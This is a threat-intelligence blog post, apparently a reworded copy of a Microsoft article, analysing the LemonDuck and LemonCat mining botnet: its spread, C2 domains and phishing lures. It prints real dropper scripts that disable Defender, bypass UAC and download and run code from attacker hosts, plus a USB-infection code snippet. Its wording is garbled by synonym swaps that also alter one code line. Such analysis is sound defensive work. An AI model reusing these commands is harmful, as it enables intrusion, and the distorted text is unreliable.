HomeTechnologyWhen coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining...

When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of assaults. Anything that can achieve entry to machines—even so-called commodity malware—can bring in more risky threats. We’ve seen this in banking Trojans serving as entry point for ransomware and palms-on-keyboard assaults. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, past using sources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s 1 of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a broad range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has proven that it can quickly take advantage of news, events, or the release of new exploits to run efficient campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email assaults. In 2021, it exploited newly patched Exchange Server vulnerabilities to achieve entry to outdated systems.

This threat, however, does not just limit itself to new or wellliked vulnerabilities. It continues to use older vulnerabilities, which advantage the attackers at times when focus shifts to patching a wellliked vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to achieve entry.

In the early years, LemonDuck targeted China closely, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam looking the most encounters.

When coin miners evolve Part 1 Exposing LemonDuck and LemonCat

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns initiated using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in palms-on-keyboard actions post-breach, which varied relying on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck nonetheless utilizes C2s, functions, script buildings, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and proceed to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable perception into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the significance of having comprehensive visibility into the broad range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more risky adversarial assaults.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and start the operation again. Many of these behaviors are nonetheless observed in LemondDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in 1 of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used 2 sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term nonetheless appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in assaults as recently as June 2021.

LemonDuck frequently utilizes open-source material constructed off of sources also used by other botnets, so there are many components of this threat that would seem acquainted. Microsoft researchers are aware of 2 distinct operating buildings, which both use the LemonDuck malware but are probably operated by 2 different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures mentioned in this report. It is highly constant in operating campaigns and performs restricted follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 websites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call “Cat” infrastructure—for primarily using 2 domains with the phrase “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in assaults exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in assaults that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.


Sample Duck domains Sample Cat domains
  • cdnimages[.]xyz
  • bb3u9[.]com
  • zz3r0[.]com
  • pp6r1[.]com
  • amynx[.]com
  • ackng[.]com
  • hwqloan[.]com
  • js88[.]ag
  • zer9g[.]com
  • b69kq[.]com
  • sqlnetcat[.]com
  • netcatkit[.]com
  • down[.]sqlnetcat[.]com


The Duck and Cat infrastructures use identical subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on identical or identical websites for their mining, lateral movement, and competition-removing scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more risky campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence provides necessary context for understanding this threat: the same set of tools, entry, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

1627041363 597 When coin miners evolve Part 1 Exposing LemonDuck and LemonCat

Figure 2. LemonDuck assault chain from the Duck and Cat infrastructures

Initial entry

LemonDuck spreads in a variety of ways, but the 2 main methods are (1) compromises that are either edge-initiated or facilitated by bot implants shifting laterally inside an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but 1 if its main functions is to unfold by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very efficient at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and codecs. These attachment names and codecs have changed very tiny from identical campaigns that occurred in early 2020.


Sample email subjects Sample email body content
  • The Truth of COVID-19
  • COVID-19 nCov Special information WHO
  • WTF
  • What the fcuk
  • fine bye
  • farewell letter
  • broken file
  • This is your order?
  • Virus actually comes from United States of America
  • very necessary infomation for Covid-19
  • see attached document for your action and discretion.
  • the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near prospective.
  • what’s inaccurate with you?are you out of your mind!!!!!
  • are you out of your mind!!!!!what ‘s inaccurate with you?
  • fine bye, hold in touch
  • can you help me to fix the file,i can’t read it
  • file is brokened, i can’t open it

The attachment used for these lures is 1 of 3 types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all 3 types are present in the same email.

1627041363 61 When coin miners evolve Part 1 Exposing LemonDuck and LemonCat

Figure 3. Sample email

While the JavaScript is detected by many security distributors, it might be categorized with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) immediately from mail downloads through solutions such as custom detection rules.

Since LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has changed the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very identical throughout 2020 and 2021, with minor changes relying on the version, indicating continued development. Below is a comparability of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.


April 2020 PowerShell script March 2021 PowerShell script
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c "if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1);
//This File is broken.


After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is tried on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement inside the compromised environment, as well as through USB and related drives. These processes are often kicked off routinely and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a operating list of drives that are already infected based on whether it finds the threat already installed. Once checked against the operating list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional assaults.

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
if (blacklist.Contains(drive.Name))
{ proceed;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
if (!File.Exists(drive + home + inf_data))
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
else {
Console.WriteLine(drive.Name+" already infected!");

Comprehensive protection against a broad-ranging malware operation

The cross-domain visibility and coordinated protection delivered by Microsoft 365 Defender is designed for the broad range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as unfold the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and achieve a foothold on the community, so security operations teams can efficiently and confidently reply to and resolve these assaults. Microsoft 365 Defender correlates cross-platform, cross-domain indicators to paint the end-to-end assault chain, allowing organizations to see the full impact of an assault. We also revealed a threat analytics article on this threat. Microsoft 365 Defender clients can use this report to get necessary technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automated behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck assaults, as well as mitigation recommendations for strengthening defenses against these assaults.


Microsoft 365 Defender Threat Intelligence Team

Go to the source

Most Popular